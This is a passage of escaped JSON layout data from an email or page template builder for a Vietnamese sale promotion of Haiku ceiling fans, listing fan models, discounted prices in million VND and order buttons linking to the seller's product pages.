22px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_menu_1\\\",\\\"htmlClassNames\\\":\\\"u_content_menu\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"layout\\\":\\\"vertical\\\",\\\"padding\\\":\\\"8px 8px 5px\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"nkA-MY1qR_\\\",\\\"cells\\\":[32,68],\\\"columns\\\":[{\\\"id\\\":\\\"kP7c3hS5Az\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AqPg555pA_\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>S\\u1eec D\\u1ee4NG N\\u0102NG L\\u01af\\u1ee2NG HI\\u1ec6U QU\\u1ea2<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"fPawRWFj5H\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/haiku.hogiaphat.vn\\/#p=1\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_15\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">E-CATALOGUE HAIKU FANS<\\/span>\\\",\\\"calculatedWidth\\\":172,\\\"calculatedHeight\\\":54}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"4HNAvVw3j1\\\",\\\"contents\\\":[{\\\"id\\\":\\\"EVfwBXUg9l\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"#111416\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Lh01KT4742\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"YPcxKW0bL1\\\",\\\"contents\\\":[{\\\"id\\\":\\\"QFxol5LSWl\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 25.2px; font-size: 18px;\\\\\\\">SALE OFF<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"50oHQS9KBh\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#383a3c\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-size: 38px; line-height: 45.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 45.6px; font-family: \'Open Sans\', sans-serif; font-size: 38px;\\\\\\\">CH\\u01af\\u01a0NG TR\\u00ccNH GI\\u1ea2M GI\\u00c1 T3<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"OkTyVEU8-N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 0px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 28px; font-size: 20px;\\\\\\\"><span style=\\\\\\\"color: #db1908; line-height: 28px; font-size: 20px;\\\\\\\">GI\\u00c1 T\\u1ed0T NH\\u1ea4T<\\/span> T\\u1eea HAMILTON AIR<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"PbNE9MySh0\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"gWIFbweT7m\\\",\\\"contents\\\":[{\\\"id\\\":\\\"kR188iMYu6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763735498-L-caramel-wh.jpg\\\",\\\"width\\\":360,\\\"height\\\":240,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"kpsfr-HGAa\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"zQWRi0C_rw\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>CARAMEL WHITE 52\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BnbBoNCpLG\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">23.8 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">19.0 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Ywz0lJEblu\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-52inch-mau-caramel.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"ZnXDn5Opvc\\\",\\\"contents\\\":[{\\\"id\\\":\\\"P5OtO300Rz\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763684307-cocoa_bamboo.jpg\\\",\\\"width\\\":360,\\\"height\\\":240},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YevU_4k3GY\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU H - SMART CEILING FANS<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"52iCw45boK\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>COCOA BAMBOO - 60\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xlktZNhNOB\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">39.6 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup><span style=\\\\\\\"line-height: 12px;\\\\\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">32.6 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"UAWeiywcki\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh-cao-cap-haiku-60inch-caramel-bamboo.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderRightWidth\\\":\\\"0px\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderBottomWidth\\\":\\\"0px\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\"},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T 